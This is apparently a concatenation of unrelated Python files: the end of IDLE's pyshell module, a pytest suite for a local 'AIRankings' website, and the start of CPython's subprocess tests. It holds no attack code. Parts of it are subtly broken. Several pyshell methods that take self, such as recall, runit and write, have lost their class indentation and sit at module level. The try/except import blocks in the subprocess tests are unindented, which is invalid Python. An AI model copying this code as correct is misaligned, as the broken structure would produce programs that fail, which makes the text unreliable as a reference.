        self.tkconsole.resetoutput()
        self.checklinecache()
        InteractiveInterpreter.showtraceback(self)
        if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
            self.tkconsole.open_stack_viewer()

    def checklinecache(self):
        # Drop every linecache entry except the shell's <pyshell#N> entries.
        c = linecache.cache
        for key in list(c.keys()):
            if key[:1] + key[-1:] != "<>":
                del c[key]

    def runcommand(self, code):
        "Run the code without invoking the debugger"
        # The code better not raise an exception!
        if self.tkconsole.executing:
            self.display_executing_dialog()
            return 0
        if self.rpcclt:
            self.rpcclt.remotequeue("exec", "runcode", (code,), {})
        else:
            exec(code, self.locals)
        return 1

    def runcode(self, code):
        "Override base class method"
        if self.tkconsole.executing:
            # NOTE(review): ModifiedInterpreter defines no 'interp'
            # attribute, so this line looks like it would raise
            # AttributeError if ever reached -- confirm intent.
            self.interp.restart_subprocess()
        self.checklinecache()
        if self.save_warnings_filters is not None:
            warnings.filters[:] = self.save_warnings_filters
            self.save_warnings_filters = None
        debugger = self.debugger
        try:
            self.tkconsole.beginexecuting()
            if not debugger and self.rpcclt is not None:
                # Normal case: ship the code to the subprocess.
                self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
                                                        (code,), {})
            elif debugger:
                debugger.run(code, self.locals)
            else:
                exec(code, self.locals)
        except SystemExit:
            if not self.tkconsole.closing:
                if tkMessageBox.askyesno(
                        "Exit?",
                        "Do you want to exit altogether?",
                        default="yes",
                        parent=self.tkconsole.text):
                    raise
                else:
                    self.showtraceback()
            else:
                raise
        except:
            if use_subprocess:
                print("IDLE internal error in runcode()",
                      file=self.tkconsole.stderr)
                self.showtraceback()
                self.tkconsole.endexecuting()
            else:
                if self.tkconsole.canceled:
                    self.tkconsole.canceled = False
                    print("KeyboardInterrupt", file=self.tkconsole.stderr)
                else:
                    self.showtraceback()
        finally:
            if not use_subprocess:
                try:
                    self.tkconsole.endexecuting()
                except AttributeError:  # shell may have closed
                    pass

    def write(self, s):
        "Override base class method"
        return self.tkconsole.stderr.write(s)

    def display_port_binding_error(self):
        """Error dialog: could not bind the local RPC socket."""
        tkMessageBox.showerror(
            "Port Binding Error",
            "IDLE can't bind to a TCP/IP port, which is necessary to "
            "communicate with its Python execution server.  This might be "
            "because no networking is installed on this computer.  "
            "Run IDLE with the -n command line switch to start without a "
            "subprocess and refer to Help/IDLE Help 'Running without a "
            "subprocess' for further details.",
            parent=self.tkconsole.text)

    def display_no_subprocess_error(self):
        """Error dialog: subprocess started but never connected back."""
        tkMessageBox.showerror(
            "Subprocess Startup Error",
            "IDLE's subprocess didn't make connection.  Either IDLE can't "
            "start a subprocess or personal firewall software is blocking "
            "the connection.",
            parent=self.tkconsole.text)

    def display_executing_dialog(self):
        """Error dialog: a command is already running."""
        tkMessageBox.showerror(
            "Already executing",
            "The Python Shell window is already executing a command; "
            "please wait until it is finished.",
            parent=self.tkconsole.text)
class PyShell(OutputWindow):
    """The interactive Python shell window."""

    shell_title = "Python " + python_version() + " Shell"

    # Override classes
    ColorDelegator = ModifiedColorDelegator
    UndoDelegator = ModifiedUndoDelegator

    # Override menus
    menu_specs = [
        ("file", "_File"),
        ("edit", "_Edit"),
        ("debug", "_Debug"),
        ("options", "_Options"),
        ("window", "_Window"),
        ("help", "_Help"),
    ]

    # Extend right-click context menu
    rmenu_specs = OutputWindow.rmenu_specs + [
        ("Squeeze", "<<squeeze-current-text>>"),
    ]

    # New classes
    from idlelib.history import History
    def __init__(self, flist=None):
        """Create the shell window, its interpreter, and pseudo std streams."""
        if use_subprocess:
            # Insert the Shell menu before Debug unless already present.
            ms = self.menu_specs
            if ms[2][0] != "shell":
                ms.insert(2, ("shell", "She_ll"))
        self.interp = ModifiedInterpreter(self)
        if flist is None:
            # Standalone shell: create our own hidden Tk root and file list.
            root = Tk()
            fixwordbreaks(root)
            root.withdraw()
            flist = PyShellFileList(root)

        OutputWindow.__init__(self, flist, None, None)

        self.usetabs = True
        # indentwidth must be 8 when using tabs.  See note in EditorWindow:
        self.indentwidth = 8

        self.sys_ps1 = sys.ps1 if hasattr(sys, 'ps1') else '>>> '
        self.prompt_last_line = self.sys_ps1.split('\n')[-1]
        self.prompt = self.sys_ps1  # Changes when debug active

        text = self.text
        text.configure(wrap="char")
        text.bind("<<newline-and-indent>>", self.enter_callback)
        text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
        text.bind("<<interrupt-execution>>", self.cancel_callback)
        text.bind("<<end-of-file>>", self.eof_callback)
        text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
        text.bind("<<toggle-debugger>>", self.toggle_debugger)
        text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
        if use_subprocess:
            text.bind("<<view-restart>>", self.view_restart_mark)
            text.bind("<<restart-shell>>", self.restart_shell)

        # Save originals so _close() can restore the real std streams.
        self.save_stdout = sys.stdout
        self.save_stderr = sys.stderr
        self.save_stdin = sys.stdin
        from idlelib import iomenu
        self.stdin = PseudoInputFile(self, "stdin", iomenu.encoding)
        self.stdout = PseudoOutputFile(self, "stdout", iomenu.encoding)
        self.stderr = PseudoOutputFile(self, "stderr", iomenu.encoding)
        self.console = PseudoOutputFile(self, "console", iomenu.encoding)
        if not use_subprocess:
            # In-process execution: user code shares our std streams.
            sys.stdout = self.stdout
            sys.stderr = self.stderr
            sys.stdin = self.stdin
        try:
            # page help() text to shell.
            import pydoc # import must be done here to capture i/o binding
            # XXX KBK 27Dec07 use text viewer someday, but must work w/o subproc
            pydoc.pager = pydoc.plainpager
        except:
            sys.stderr = sys.__stderr__
            raise
        #
        self.history = self.History(self.text)
        #
        self.pollinterval = 50  # millisec
    def get_standard_extension_names(self):
        "Return the extensions configured for the shell only."
        return idleConf.GetExtensions(shell_only=True)

    # State flags for the shell's read/eval loop (class-level defaults).
    reading = False           # inside readline()'s nested mainloop
    executing = False         # user code currently running
    canceled = False          # interrupt requested
    endoffile = False         # EOF requested
    closing = False           # window shutdown in progress
    _stop_readline_flag = False   # stop_readline() requested

    def set_warning_stream(self, stream):
        "Redirect idle_showwarning() output to *stream*."
        global warning_stream
        warning_stream = stream

    def get_warning_stream(self):
        "Return the current idle_showwarning() output stream."
        return warning_stream
    def toggle_debugger(self, event=None):
        """Turn the debugger on or off; refused while code is executing."""
        if self.executing:
            tkMessageBox.showerror("Don't debug now",
                "You can only toggle the debugger when idle",
                parent=self.text)
            self.set_debugger_indicator()
            return "break"
        else:
            db = self.interp.getdebugger()
            if db:
                self.close_debugger()
            else:
                self.open_debugger()

    def set_debugger_indicator(self):
        # Keep the Debug menu checkbutton in sync with the actual state.
        db = self.interp.getdebugger()
        self.setvar("<<toggle-debugger>>", not not db)

    def toggle_jit_stack_viewer(self, event=None):
        pass # All we need is the variable

    def close_debugger(self):
        """Shut down the debugger (local and, if present, remote) and
        restore the normal prompt."""
        db = self.interp.getdebugger()
        if db:
            self.interp.setdebugger(None)
            db.close()
            if self.interp.rpcclt:
                debugger_r.close_remote_debugger(self.interp.rpcclt)
            self.resetoutput()
            self.console.write("[DEBUG OFF]\n")
            self.prompt = self.sys_ps1
            self.showprompt()
        self.set_debugger_indicator()

    def open_debugger(self):
        """Start the debugger GUI (remote when a subprocess is connected)
        and switch to the [DEBUG ON] prompt."""
        if self.interp.rpcclt:
            dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
                                                           self)
        else:
            dbg_gui = debugger.Debugger(self)
        self.interp.setdebugger(dbg_gui)
        dbg_gui.load_breakpoints()
        self.prompt = "[DEBUG ON]\n" + self.sys_ps1
        self.showprompt()
        self.set_debugger_indicator()
    def beginexecuting(self):
        "Helper for ModifiedInterpreter"
        self.resetoutput()
        self.executing = 1

    def endexecuting(self):
        "Helper for ModifiedInterpreter"
        self.executing = 0
        self.canceled = 0
        self.showprompt()

    def close(self):
        "Extend EditorWindow.close()"
        if self.executing:
            # Confirm killing a running program before closing the window.
            response = tkMessageBox.askokcancel(
                "Kill?",
                "Your program is still running!\n Do you want to kill it?",
                default="ok",
                parent=self.text)
            if response is False:
                return "cancel"
        self.stop_readline()
        self.canceled = True
        self.closing = True
        return EditorWindow.close(self)

    def _close(self):
        "Extend EditorWindow._close(), shut down debugger and execution server"
        self.close_debugger()
        if use_subprocess:
            self.interp.kill_subprocess()
        # Restore std streams
        sys.stdout = self.save_stdout
        sys.stderr = self.save_stderr
        sys.stdin = self.save_stdin
        # Break cycles
        self.interp = None
        self.console = None
        self.flist.pyshell = None
        self.history = None
        EditorWindow._close(self)

    def ispythonsource(self, filename):
        "Override EditorWindow method: never remove the colorizer"
        return True

    def short_title(self):
        # Window title shown in the Window menu.
        return self.shell_title

    COPYRIGHT = \
          'Type "help", "copyright", "credits" or "license()" for more information.'
    def begin(self):
        """Start the shell: connect the subprocess (if any), print the
        banner, and show the first prompt.  Returns False on failure."""
        self.text.mark_set("iomark", "insert")
        self.resetoutput()
        if use_subprocess:
            nosub = ''
            client = self.interp.start_subprocess()
            if not client:
                self.close()
                return False
        else:
            nosub = ("==== No Subprocess ====\n\n" +
                    "WARNING: Running IDLE without a Subprocess is deprecated\n" +
                    "and will be removed in a later version. See Help/IDLE Help\n" +
                    "for details.\n\n")
            sys.displayhook = rpc.displayhook

        self.write("Python %s on %s\n%s\n%s" %
                   (sys.version, sys.platform, self.COPYRIGHT, nosub))
        self.text.focus_force()
        self.showprompt()
        import tkinter
        tkinter._default_root = None # 03Jan04 KBK What's this?
        return True
    def stop_readline(self):
        """Abort a pending readline() by exiting its nested mainloop."""
        if not self.reading:  # no nested mainloop to exit.
            return
        self._stop_readline_flag = True
        self.top.quit()

    def readline(self):
        """Block in a nested Tk mainloop until the user submits a line;
        return it (or "" on EOF / forced stop)."""
        save = self.reading
        try:
            self.reading = 1
            self.top.mainloop()  # nested mainloop()
        finally:
            self.reading = save
        if self._stop_readline_flag:
            self._stop_readline_flag = False
            return ""
        line = self.text.get("iomark", "end-1c")
        if len(line) == 0:  # may be EOF if we quit our mainloop with Ctrl-C
            line = "\n"
        self.resetoutput()
        if self.canceled:
            self.canceled = 0
            if not use_subprocess:
                raise KeyboardInterrupt
        if self.endoffile:
            self.endoffile = 0
            line = ""
        return line
    def isatty(self):
        # The pseudo std streams present the shell as an interactive tty.
        return True

    def cancel_callback(self, event=None):
        """Handle Ctrl-C: interrupt running code or cancel pending input."""
        try:
            if self.text.compare("sel.first", "!=", "sel.last"):
                return # Active selection -- always use default binding
        except:
            # No selection exists; proceed with the interrupt.
            pass
        if not (self.executing or self.reading):
            # Idle shell: just report the interrupt and reprompt.
            self.resetoutput()
            self.interp.write("KeyboardInterrupt\n")
            self.showprompt()
            return "break"
        self.endoffile = 0
        self.canceled = 1
        if (self.executing and self.interp.rpcclt):
            if self.interp.getdebugger():
                self.interp.restart_subprocess()
            else:
                self.interp.interrupt_subprocess()
        if self.reading:
            self.top.quit()  # exit the nested mainloop() in readline()
        return "break"

    def eof_callback(self, event):
        """Handle Ctrl-D: close the shell when idle, or signal EOF to a
        pending readline()."""
        if self.executing and not self.reading:
            return # Let the default binding (delete next char) take over
        if not (self.text.compare("iomark", "==", "insert") and
                self.text.compare("insert", "==", "end-1c")):
            return # Let the default binding (delete next char) take over
        if not self.executing:
            self.resetoutput()
            self.close()
        else:
            self.canceled = 0
            self.endoffile = 1
            self.top.quit()
        return "break"

    def linefeed_callback(self, event):
        # Insert a linefeed without entering anything (still autoindented)
        if self.reading:
            self.text.insert("insert", "\n")
            self.text.see("insert")
        else:
            self.newline_and_indent_event(event)
        return "break"
    def enter_callback(self, event):
        """Handle Return: recall earlier input when the cursor is in history,
        otherwise submit (or continue) the current input region."""
        if self.executing and not self.reading:
            return # Let the default binding (insert '\n') take over
        # If some text is selected, recall the selection
        # (but only if this before the I/O mark)
        try:
            sel = self.text.get("sel.first", "sel.last")
            if sel:
                if self.text.compare("sel.last", "<=", "iomark"):
                    self.recall(sel, event)
                    return "break"
        except:
            # No selection; fall through to positional handling.
            pass
        # If we're strictly before the line containing iomark, recall
        # the current line, less a leading prompt, less leading or
        # trailing whitespace
        if self.text.compare("insert", "<", "iomark linestart"):
            # Check if there's a relevant stdin range -- if so, use it
            prev = self.text.tag_prevrange("stdin", "insert")
            if prev and self.text.compare("insert", "<", prev[1]):
                self.recall(self.text.get(prev[0], prev[1]), event)
                return "break"
            next = self.text.tag_nextrange("stdin", "insert")
            if next and self.text.compare("insert lineend", ">=", next[0]):
                self.recall(self.text.get(next[0], next[1]), event)
                return "break"
            # No stdin mark -- just get the current line, less any prompt
            indices = self.text.tag_nextrange("console", "insert linestart")
            if indices and \
               self.text.compare(indices[0], "<=", "insert linestart"):
                self.recall(self.text.get(indices[1], "insert lineend"), event)
            else:
                self.recall(self.text.get("insert linestart", "insert lineend"), event)
            return "break"
        # If we're between the beginning of the line and the iomark, i.e.
        # in the prompt area, move to the end of the prompt
        if self.text.compare("insert", "<", "iomark"):
            self.text.mark_set("insert", "iomark")
        # If we're in the current input and there's only whitespace
        # beyond the cursor, erase that whitespace first
        s = self.text.get("insert", "end-1c")
        if s and not s.strip():
            self.text.delete("insert", "end-1c")
        # If we're in the current input before its last line,
        # insert a newline right at the insert point
        if self.text.compare("insert", "<", "end-1c linestart"):
            self.newline_and_indent_event(event)
            return "break"
        # We're in the last line; append a newline and submit it
        self.text.mark_set("insert", "end-1c")
        if self.reading:
            self.text.insert("insert", "\n")
            self.text.see("insert")
        else:
            self.newline_and_indent_event(event)
        self.text.tag_add("stdin", "iomark", "end-1c")
        self.text.update_idletasks()
        if self.reading:
            self.top.quit() # Break out of recursive mainloop()
        else:
            self.runit()
        return "break"
def recall(self, s, event):
    """Paste a previously entered statement *s* at the input point,
    stripped of blank edge lines and re-indented to the current prompt."""
    # Drop leading and trailing empty or whitespace-only lines.
    s = re.sub(r'^\s*\n', '', s)
    s = re.sub(r'\n\s*$', '', s)
    recalled = s.split('\n')
    self.text.undo_block_start()
    try:
        self.text.tag_remove("sel", "1.0", "end")
        self.text.mark_set("insert", "end-1c")
        prompt_prefix = self.text.get("insert linestart", "insert")
        if prompt_prefix.rstrip().endswith(':'):
            # The current line opens a block: start a fresh indented line.
            self.newline_and_indent_event(event)
            prompt_prefix = self.text.get("insert linestart", "insert")
        self.text.insert("insert", recalled[0].strip())
        if len(recalled) > 1:
            old_indent = re.search(r'^([ \t]*)', recalled[0]).group(0)
            new_indent = re.search(r'^([ \t]*)', prompt_prefix).group(0)
            for ln in recalled[1:]:
                if ln.startswith(old_indent):
                    # Swap the original base indentation for the new one.
                    ln = new_indent + ln[len(old_indent):]
                self.text.insert('insert', '\n' + ln.rstrip())
    finally:
        self.text.see("insert")
        self.text.undo_block_stop()
def runit(self):
    """Hand the current input region over to the interpreter."""
    line = self.text.get("iomark", "end-1c")
    # Strip trailing blanks and at most one final newline plus the
    # blanks around it, so hitting Return twice can end a statement.
    line = line.rstrip(" \t")
    if line.endswith("\n"):
        line = line[:-1].rstrip(" \t")
    self.interp.runsource(line)
def open_stack_viewer(self, event=None):
    """Open a stack viewer on the most recent traceback, if any.

    With a subprocess (rpcclt set), delegate to the remote viewer;
    otherwise browse sys.last_traceback locally, or show an error
    dialog when no traceback has been stored yet.
    """
    if self.interp.rpcclt:
        return self.interp.remote_stack_viewer()
    try:
        sys.last_traceback
    except AttributeError:
        # Fix: was a bare `except:`, which also swallowed
        # KeyboardInterrupt and other unrelated exceptions; only the
        # missing-attribute case means "no traceback yet".
        tkMessageBox.showerror("No stack trace",
                               "There is no stack trace yet.\n"
                               "(sys.last_traceback is not defined)",
                               parent=self.text)
        return
    from idlelib.stackviewer import StackBrowser
    StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
    "Scroll the shell so the I/O mark and the restart line are visible."
    self.text.see("iomark")
    self.text.see("restart")
def restart_shell(self, event=None):
    "Callback for Run/Restart Shell Cntl-F6"
    # Restart the subprocess, keeping the current working directory.
    self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
    """Write a fresh prompt and position the insertion cursor after it."""
    self.resetoutput()
    self.console.write(self.prompt)
    self.text.mark_set("insert", "end-1c")
    self.set_line_and_column()
    # Reset the undo machinery for the new input region.
    self.io.reset_undo()
def resetoutput(self):
    """Store the pending input region in history and move iomark to the end."""
    source = self.text.get("iomark", "end-1c")
    if self.history:
        self.history.store(source)
    # Ensure subsequent output begins on a fresh line.
    if self.text.get("end-2c") != "\n":
        self.text.insert("end-1c", "\n")
    self.text.mark_set("iomark", "end-1c")
    self.set_line_and_column()
def write(self, s, tags=()):
    """Write s to the shell window at iomark with the given tags.

    Raises UnicodeEncodeError for non-BMP characters (Tk cannot display
    them) and KeyboardInterrupt when output was canceled while running
    without a subprocess.  Returns the count from OutputWindow.write.
    """
    if isinstance(s, str) and len(s) and max(s) > '\uffff':
        # Tk doesn't support outputting non-BMP characters
        # Let's assume what printed string is not very long,
        # find first non-BMP character and construct informative
        # UnicodeEncodeError exception.
        for start, char in enumerate(s):
            if char > '\uffff':
                break
        raise UnicodeEncodeError("UCS-2", char, start, start+1,
                                 'Non-BMP character not supported in Tk')
    try:
        # Flip iomark gravity so the inserted output ends up *before*
        # the mark, then restore it.
        self.text.mark_gravity("iomark", "right")
        count = OutputWindow.write(self, s, tags, "iomark")
        self.text.mark_gravity("iomark", "left")
    except:
        raise ###pass  # ### 11Aug07 KBK if we are expecting exceptions
                       # let's find out what they are and be specific.
    if self.canceled:
        self.canceled = 0
        if not use_subprocess:
            raise KeyboardInterrupt
    return count
def rmenu_check_cut(self):
    "Disable Cut when the selection reaches into the read-only prompt area."
    try:
        sel_in_prompt = self.text.compare('sel.first', '<', 'iomark')
    except TclError:
        # No selection, so the index 'sel.first' doesn't exist.
        return 'disabled'
    if sel_in_prompt:
        return 'disabled'
    return super().rmenu_check_cut()
def rmenu_check_paste(self):
    "Disable Paste when the cursor sits before the I/O mark."
    if self.text.compare('insert', '<', 'iomark'):
        return 'disabled'
    return super().rmenu_check_paste()
def fix_x11_paste(root):
    "Make paste replace selection on x11.  See issue #5124."
    if root._windowingsystem != 'x11':
        return
    for widget_class in ('Text', 'Entry', 'Spinbox'):
        # Prepend a selection-delete to the existing class binding.
        old_binding = root.bind_class(widget_class, '<<Paste>>')
        root.bind_class(
            widget_class,
            '<<Paste>>',
            'catch {%W delete sel.first sel.last}\n' + old_binding)
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
    """IDLE entry point: parse the command line, set up the Tk root,
    and open editor and/or shell windows per the options and config.

    Mutates the module globals flist, root and use_subprocess, and
    rewrites sys.argv/sys.path for the code the user will run.
    """
    import getopt
    from platform import system
    from idlelib import testing  # bool value
    from idlelib import macosx
    global flist, root, use_subprocess
    capture_warnings(True)
    # Option state; each -X flag below toggles one of these.
    use_subprocess = True
    enable_shell = False
    enable_edit = False
    debug = False
    cmd = None
    script = None
    startup = False
    try:
        opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
    except getopt.error as msg:
        print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
        sys.exit(2)
    for o, a in opts:
        if o == '-c':
            cmd = a
            enable_shell = True
        if o == '-d':
            debug = True
            enable_shell = True
        if o == '-e':
            enable_edit = True
        if o == '-h':
            sys.stdout.write(usage_msg)
            sys.exit()
        if o == '-i':
            enable_shell = True
        if o == '-n':
            print(" Warning: running IDLE without a subprocess is deprecated.",
                  file=sys.stderr)
            use_subprocess = False
        if o == '-r':
            script = a
            if os.path.isfile(script):
                pass
            else:
                print("No script file: ", script)
                sys.exit()
            enable_shell = True
        if o == '-s':
            startup = True
            enable_shell = True
        if o == '-t':
            PyShell.shell_title = a
            enable_shell = True
    # A lone '-' argument means: read the command to run from stdin.
    if args and args[0] == '-':
        cmd = sys.stdin.read()
        enable_shell = True
    # process sys.argv and sys.path:
    for i in range(len(sys.path)):
        sys.path[i] = os.path.abspath(sys.path[i])
    # Rebuild sys.argv as the command/script being run will see it.
    if args and args[0] == '-':
        sys.argv = [''] + args[1:]
    elif cmd:
        sys.argv = ['-c'] + args
    elif script:
        sys.argv = [script] + args
    elif args:
        enable_edit = True
        # Make the directories of the files being edited importable.
        pathx = []
        for filename in args:
            pathx.append(os.path.dirname(filename))
        for dir in pathx:
            dir = os.path.abspath(dir)
            if not dir in sys.path:
                sys.path.insert(0, dir)
    else:
        dir = os.getcwd()
        if dir not in sys.path:
            sys.path.insert(0, dir)
    # check the IDLE settings configuration (but command line overrides)
    edit_start = idleConf.GetOption('main', 'General',
                                    'editor-on-startup', type='bool')
    enable_edit = enable_edit or edit_start
    enable_shell = enable_shell or not enable_edit
    # Setup root.  Don't break user code run in IDLE process.
    # Don't change environment when testing.
    if use_subprocess and not testing:
        NoDefaultRoot()
    root = Tk(className="Idle")
    root.withdraw()
    from idlelib.run import fix_scaling
    fix_scaling(root)
    # set application icon
    icondir = os.path.join(os.path.dirname(__file__), 'Icons')
    if system() == 'Windows':
        iconfile = os.path.join(icondir, 'idle.ico')
        root.wm_iconbitmap(default=iconfile)
    else:
        # Tk 8.6 supports PNG; fall back to GIF on older Tk.
        ext = '.png' if TkVersion >= 8.6 else '.gif'
        iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
                     for size in (16, 32, 48)]
        icons = [PhotoImage(master=root, file=iconfile)
                 for iconfile in iconfiles]
        root.wm_iconphoto(True, *icons)
    # start editor and/or shell windows:
    fixwordbreaks(root)
    fix_x11_paste(root)
    flist = PyShellFileList(root)
    macosx.setupApp(root, flist)
    if enable_edit:
        if not (cmd or script):
            for filename in args[:]:
                if flist.open(filename) is None:
                    # filename is a directory actually, disconsider it
                    args.remove(filename)
            if not args:
                flist.new()
    if enable_shell:
        shell = flist.open_shell()
        if not shell:
            return # couldn't open shell
        if macosx.isAquaTk() and flist.dict:
            # On OSX: when the user has double-clicked on a file that causes
            # IDLE to be launched the shell window will open just in front of
            # the file she wants to see. Lower the interpreter window when
            # there are open files.
            shell.top.lower()
    else:
        shell = flist.pyshell
    # Handle remaining options. If any of these are set, enable_shell
    # was set also, so shell must be true to reach here.
    if debug:
        shell.open_debugger()
    if startup:
        filename = os.environ.get("IDLESTARTUP") or \
                   os.environ.get("PYTHONSTARTUP")
        if filename and os.path.isfile(filename):
            shell.interp.execfile(filename)
    if cmd or script:
        # Install the rebuilt sys.argv inside the subprocess, then run
        # the requested command or script there.
        shell.interp.runcommand("""if 1:
            import sys as _sys
            _sys.argv = %r
            del _sys
            \n""" % (sys.argv,))
        if cmd:
            shell.interp.execsource(cmd)
        elif script:
            shell.interp.prepend_syspath(script)
            shell.interp.execfile(script)
    elif shell:
        # If there is a shell window and no cmd or script in progress,
        # check for problematic OS X Tk versions and print a warning
        # message in the IDLE shell window; this is less intrusive
        # than always opening a separate window.
        tkversionwarning = macosx.tkVersionWarning(root)
        if tkversionwarning:
            shell.interp.runcommand("print('%s')" % tkversionwarning)
    while flist.inversedict:  # keep IDLE running while files are open.
        root.mainloop()
    root.destroy()
    capture_warnings(False)
if __name__ == "__main__":
    # Also register this module under the name 'pyshell' so code that
    # imports 'pyshell' shares the running main module's globals.
    # NOTE(review): presumed intent — confirm against callers.
    sys.modules['pyshell'] = sys.modules['__main__']
    main()

capture_warnings(False)  # Make sure turned off; see issue 18081
|
testsWebsite.py | import sys
import json
from http.client import HTTPConnection, HTTPException
from bs4 import BeautifulSoup
import requests
import os
from threading import Thread
from airankings import main
# Absolute path of the directory containing this test module.
basedir = os.path.abspath(os.path.dirname(__file__))
# JSON file listing the AI venues the website is expected to display.
venueSource = basedir + '/../app/static/ai_venues.json'
# (host, port) of the locally running dev server the tests talk to.
URL = ('localhost', 5000)
class TestWebsite:
    """Integration tests for the AIRankings web app.

    All tests expect a server already listening on URL (localhost:5000);
    they do not start one themselves.
    """
    # website_thread = Thread(target=main)
    # website_thread.start()

    @staticmethod
    def get_website(get='/'):
        """Fetch path *get* from the local server and return it as soup.

        Exits the test run with a message when the server is unreachable
        or the returned HTML cannot be parsed.
        """
        conn = HTTPConnection(URL[0], URL[1])
        try:
            try:
                conn.request('GET', get)
                contents = conn.getresponse().read()
            except HTTPException:
                sys.exit('AIRankings could not be reached. ')
        finally:
            conn.close()  # fix: connection was previously never closed
        try:
            soup = BeautifulSoup(contents, 'html.parser')
        except Exception:  # fix: was a bare except (also caught SystemExit)
            sys.exit('HTML of web page is not valid. ')
        return soup

    def test_conferences(self):
        # Check that the page shows one HTML element per expected
        # conference, in the same order as the venue JSON (96 in total).
        def iterate_through_conferences(my_dict, conference_list):
            """Flatten the nested venue dict into an ordered key list."""
            for k, v in my_dict.items():
                if isinstance(v, dict):
                    iterate_through_conferences(v, conference_list)
                    continue
                conference_list.append(str(k))
            return conference_list

        soup = self.get_website()
        conferences_expected = []
        with open(venueSource) as venueJson:
            data = json.load(venueJson)
            conferences_expected = iterate_through_conferences(data, conferences_expected)
        counter = 0
        conferences_on_website = soup.find_all('li', class_="pl-2")
        for x in conferences_on_website:
            assert counter < len(conferences_on_website)
            venue_search = conferences_expected[counter]
            # Dig the venue label out of the nested list-item markup.
            item = x.contents[1].contents[1].contents[3].contents
            actual_venue = str(item[0])
            assert venue_search == actual_venue
            counter += 1
        assert len(conferences_on_website) == len(conferences_expected)

    def test_table(self):
        """The results container with id 'query' exists and is non-empty."""
        soup = self.get_website()
        result = soup.find(id="query")
        assert len(result) > 0

    def test_search_function(self):
        """Searching by author name returns table rows naming that author."""
        session_requests = requests.session()
        response = session_requests.get("http://localhost:5000/?search=andreas%20hotho&venues=core,AAAI,IJCAI,ECAI,Artificial%20Intelligence,JAIR")
        website = BeautifulSoup(response.text, 'html.parser')
        search_results = website.find_all('td')  # fix: findAll is a deprecated bs4 alias
        assert response.status_code == 200
        assert len(search_results) != 0
        assert ("Andreas Hotho") in search_results[1].text

    def test_shareable_overlay(self):
        # There is no way of simulating a click on the share button using
        # BeautifulSoup; using selenium could fix this issue.
        print("Not Implemented yet!")

    def test_author_pages(self):
        """An author detail page renders with HTTP 200 and content."""
        url = 'http://localhost:5000/'
        session_requests = requests.session()
        r = session_requests.post(url)
        url = 'http://localhost:5000/author?name=luc%20de%20raedt'
        r = session_requests.get(url)
        soup = BeautifulSoup(r.text, "html.parser")
        assert r.status_code == 200
        assert len(soup) > 0

    def test_author_page_functions(self):
        """The author page shows external links and a publication table."""
        authorpage = self.get_website("/author?name=luc%20de%20raedt")
        linkbox = authorpage.find("div", class_="col-6 border-left")
        assert len(linkbox.find_all('a')) > 0
        publication_table = authorpage.find("table", id='publication')
        assert publication_table is not None

    def test_search_by_googleid(self):
        """Searching by Google Scholar ID resolves to the author's rows."""
        session_requests = requests.session()
        response = session_requests.get("http://localhost:5000/?search=eWTzXFAAAAAJ&venues=core,AAAI,IJCAI,ECAI,Artificial%20Intelligence,JAIR")
        website = BeautifulSoup(response.text, 'html.parser')
        search_results = website.find_all('td')  # fix: findAll is a deprecated bs4 alias
        assert response.status_code == 200
        assert len(search_results) != 0
        assert ("Andreas Hotho") in search_results[1].text
    # website_thread.join()
|
test_subprocess.py | import unittest
from test import script_helper
from test import support
import subprocess
import sys
import signal
import io
import locale
import os
import errno
import tempfile
import time
import re
import sysconfig
import warnings
import select
import shutil
import gc
import textwrap
try:
import resource
except ImportError:
resource = None
try:
import threading
except ImportError:
threading = None
# True when running on native Windows (not Cygwin).
mswindows = (sys.platform == "win32")

#
# Depends on the following external programs: Python
#

if mswindows:
    # Prelude for child programs that must write raw bytes to stdout:
    # on Windows stdout must be switched to O_BINARY to stop \n -> \r\n
    # translation.
    SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
                 'os.O_BINARY);')
else:
    SETBINARY = ''
# Prefer the secure tempfile.mkstemp; keep a best-effort fallback for
# platforms/builds where it is missing.
try:
    mkstemp = tempfile.mkstemp
except AttributeError:
    # tempfile.mkstemp is not available
    def mkstemp():
        """Replacement for mkstemp, calling mktemp."""
        # NOTE: mktemp is race-prone; acceptable only as a test fallback.
        fname = tempfile.mktemp()
        return os.open(fname, os.O_RDWR|os.O_CREAT), fname
class BaseTestCase(unittest.TestCase):
    """Shared setup/teardown and stderr helper for the subprocess tests."""

    def setUp(self):
        # Try to minimize the number of children we have so this test
        # doesn't crash on some buildbots (Alphas in particular).
        support.reap_children()

    def tearDown(self):
        # Every Popen a test started must already have been waited on;
        # drain any stragglers and then insist the active list is empty.
        for inst in subprocess._active:
            inst.wait()
        subprocess._cleanup()
        self.assertFalse(subprocess._active, "subprocess._active not empty")

